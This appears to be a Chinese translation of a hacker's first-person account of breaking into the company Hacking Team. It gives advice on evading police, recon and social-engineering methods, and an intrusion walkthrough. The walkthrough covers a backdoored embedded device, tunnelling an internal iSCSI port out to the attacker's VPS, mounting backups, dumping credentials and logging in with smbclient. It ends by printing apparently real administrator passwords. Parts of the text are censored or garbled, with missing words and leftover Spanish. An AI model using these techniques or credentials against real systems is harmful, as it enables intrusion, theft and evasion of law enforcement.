Hacking Team 是一个协助 *** hack和监视记者、政治家等的公司（详见段尾链接），当然有时候也会监控 *** 和罪犯。其CEO——Vincenzetti——很喜欢在他的邮件末尾加上一句纳粹标语“boia chi molla” (放弃者该死)，同时，他一直宣称拥有可以解决“Tor 问题”和“暗网问题”的技术。但是我一直很怀疑他的那种技术的有效性。

　　很不幸，我们的世界是颠倒的，你越做坏事越富有，越做好事反而被抓。但幸运的是，多亏了人们的努力，比如"Tor项目"，你可以通过以下指导来防止被人抓住把柄：

　　1) 加密的你的硬盘

　　如果有一天你做的事被发现了，警察叔叔带走了你的电脑，尽管被发现就意味着你已经犯了很多错误，但是加密硬盘会比不加密要好得多。

　　2) 使用虚拟机并且把所有的 *** 都走Tor

　　这样就实现了两点，之一、你的所有流量都匿名了。第二、把你的个人生活和匿名操作分开了，防止两种生活互相混合。

　　3) 不要直接连接Tor *** (可选项)

　　Tor不是万能药，有可能你在连接到Tor *** 的时候刚好在做坏事。也可能你在退出Tor *** 的时候你同样在做坏事。更好还是用别人的wifi，或者连接vpn或者中转机子，然后连接Tor匿名 *** 。

　　尽管这个过程非常无聊，但却是非常重要，目标越大越多，漏洞出现的几率就越大。

　　1 技术方面的信息

　　主要使用以下各种方面的信息

　　1)Google

　　如果使用合适的语句，你可以发现大量的意外收获。

　　2)二级域名搜集

　　一般来说，域名大部分都是由第三方公司提供的，你需要寻找到其域名的IP范围。当然，有时候会存在DNS域传送漏洞，这样就更好搜集信息了。

　　3)Whois查询和反向查询

　　通过各种Whois查询和其ip范围的域名反向查询，你也可以获得很多其他子域名，据我所知，没有免费的反向查询，除非谷歌hack。

　　4)端口扫描和指纹提取

　　和其他的技术不同，你可以跟公司的员工聊天。我把它作为可选项放在这里因为它不是一种攻击方式，只是搜集信息的一种方式。

　　在扫描的过程中，该业务的入侵检测系统可能会告警，但是不用担心，整个Inernet都经常会扫描自身。

　　对于扫描来说，Nmap是再合适不过了，它也可以识别各种服务的指纹。但是对于大规模 *** 来说，zmap和masscan更快速。WhatWeb和BlindElephant 适合抓取web指纹。

　　2 社工信息

　　对于社会工程学来说，搜集员工信息非常重要，包括他们的各自的角色，合约，使用的操作系统，浏览器，插件，软件等。一般使用如下途径：

　　1)Google

　　这也是最有用的工具。

　　2)theHarvester y recon-ng

　　我在上一个内容中就提到了这些东西，但是他们其实还有更多的用处。你可以自动快速地找到大量的信息，这也值得你去花时间阅读官方文档。

　　3)LinkedIn

　　你可以通过这个软件获取到大量的雇员信息，内部人员总是倾向于与他人交流。

　　4)Dat ***

　　它就像拼图一样把各种信息整合在一起。

　　5)File metadata

　　你可以在他们公司发布的各种文档中找到大量有用的信息。

　　进入内网的方式有很多种。我打入HT内网的方式是不常见的，而且比平时花的精力要多得多，所以我在这里提一下进入内网的两种常见的方式，这两种也是我推荐的。

　　1 社工

　　社会工程学，尤其是鱼叉式 *** 钓鱼，是各种渗透技巧中比较可靠的一种。更多技巧请移步段尾链接。

　　我不想尝试对HT进行钓鱼攻击，因为这种攻击方式对他们来说太常见了，所以他们会非常警惕。

　　既增加了难度，又容易被发现我的意图。

　　http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

　　http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

　　http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

　　2 购买权限

　　多亏了勤劳的俄罗斯人和他们的渗透工具 “traffic sellers”和“bot herders”，许多公司都已经有了被入侵的电脑。

　　几乎所有世界五百强的大型 *** 中都存在一些被入侵的机器。

　　但是Hacking Team是个小公司，他们的大多数员工都是信息安全专家，所以他们内部存在被入侵机器的可能性非常小。

　　Gamma公司被黑以后，我就已经描述了一个寻找漏洞的过程：

　　http://pastebin.com/raw.phpi=cRYvK4jb

　　Hacking Team有一个段的公网IP:

　　inetnum: 93.62.139.32 - 93.62.139.47

　　descr: HT public subnet

　　他们的 *** 有少量暴露在外网，比如不像Gamma公司，他们的公网地址都需要证书才能连接。

　　HT的公网服务器主要有一个Joomla的博客(joomscan没有扫出来有用的东西)，一个邮件服务器，几个路由，两个VPN，一个垃圾邮箱过滤系统。

　　所以我现在只能通过以下方式获取权限：发现一个Joomla的0day，或者postfix的0day，或者他们其他一个系统的0day。

　　嵌入式系统的0day对于我来说比较靠谱点，于是我花了两周的时间，通过逆向发现了一个命令执行0day。这个0day至今仍然没有修复，所以我也不方便给出更多细节。

　　在正式攻击之前，我做了很多测试和准备，在硬件里面写入了一个后门，并且在嵌入式系统上编译了各种各样的工具：

　　1) busybox

　　这个工具大多数的Unix系机器都没有。

　　2)nmap

　　扫描工具

　　3)Responder.py

　　内网中间人攻击神器

　　4)python

　　这个必须得有

　　5)tcpdump

　　抓包

　　6)dsniff

　　在内网中嗅探各种密码之类的，我更喜欢用HT的ettercap，但是编译起来很麻烦。

　　7)socat

　　NC的升级版，主要端口转发

　　8)screen

　　可以让你多窗口执行命令，其实也不是太需要

　　9)socks5 *** 主机

　　加上proxychains，插入内网

　　10)tgcd

　　通过转发端口，穿透防火墙

　　最坑的事儿就是你把后门和工具部署上去之后，系统挂了，然后运维上去一看，全完了。所以我花了一周的时间在最后的部署之前测试我的各种后门和exp。

　　现在我已经进入内网了，我想看到处看一下，并决定我下一步的工作。把Responder.py切换到分析模式,然后用Nmap慢慢的扫着先。

　　NoSQL，这种无需认证的数据库对我来说简直就是天赐良机。当我还在担心无法通过MySQL继续下去的时候，这些缺乏认证的数据库出现了。Nmap发现了HT内网的一些数据库：

　　27017/tcp open mongodb MongoDB 2.6.5

　　| mongodb-databases:

　　| ok=1

　　| totalSizeMb=47547

　　| totalSize=49856643072

　　...

　　|_ version=2.6.5

　　27017/tcp open mongodb MongoDB 2.6.5

　　| mongodb-databases:

　　| ok=1

　　| totalSizeMb=31987

　　| totalSize=33540800512

　　| databases

　　...

　　|_ version=2.6.5

　　这些是做RCS测试的实例。RCS抓到的音频都存储在MongoDB里面。400G种子里面的音频就是来自这里，他们也在监视着自己。

　　比较有趣的是，看着监视器中正在开发恶意软件的HT，尽管这对我的渗透来说并没有什么用。他们不安全的备份系统是下一个敞开的大门。根据他们自己的文档，他们的iSCSI系统应该在一个分离的网段，但是却在192.168.1.200/24网段被nmap扫描出来了：

　　...

　　3260/tcp open iscsi

　　| iscsi-info:

　　| Target: iqn.2000-01.com.synology:ht-synology.name

　　| Address: 192.168.200.66:3260,0

　　|_ Authentication: No authentication required

　　Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

　　...

　　3260/tcp open iscsi

　　| iscsi-info:

　　| Target: iqn.2000-01.com.synology:synology-backup.name

　　| Address: 10.0.1.72:3260,0

　　| Address: 192.168.200.72:3260,0

　　|_ Authentication: No authentication required

　　iSCS需要一个核心模块，这个核心模块在我的嵌入式系统中很难编译。所以我准备把端口转发出来以便于能够在VPS上挂载。

　　VPS: tgcd -L -p 3260 -q 42838

　　Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

　　VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

　　iSCSI发现了，但是在挂载的时候出现了一些问题，它的地址同时是和。

　　解决办法是：

　　iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

　　然后：

　　iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

　　至此，文件系统现身了！挂载上去：

　　vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

　　然后就可以发现若干个虚拟机的安全备份了，邮件服务器看起来很有吸引力。尽管他太大了，还是可以远程挂载上来，搜索我们想要的东西：

　　$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk

　　$ fdisk -l /dev/loop0

　　/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

　　entonces el offset es 2048 * 512=1048576

　　$ losetup -o 1048576 /dev/loop1 /dev/loop0

　　$ mount -o ro /dev/loop1 /mnt/exchange/

　　现在，在 我们可以发现虚拟机的硬盘，然后 就可以挂载上去了：

　　vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/

　　mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

　　最后，我们就可以在看到所有老的邮件交换服务器上的东西了。

　　其实我最感兴趣的还是想在安全备份文件里面找到一些常用的密码或者hash以便于进入物理机。我使用pwdump, cachedump 和lsadump去寻找可能的密码，最后lsdadump发现了一个bes管理服务器的账户的密码:

　　_SC_BlackBerry MDS Connection Service

　　0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

　　0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.

　　0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

　　我通过proxychains加上嵌入式机器上的socks *** ，和 *** b客户端去尝试这个密码：

　　proxychains *** bclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

　　成功了！密码仍然有效，而且是本地管理员。

　　我用 *** 和的 来获取一个。我在机器上抓取到了他的其他密码，包括域管理员的密码。

　　HACKINGTEAM BESAdmin bes32678!!!

　　HACKINGTEAM Administrator uu8dd8ndd12!

　　HACKINGTEAM c.pozzi P4ssword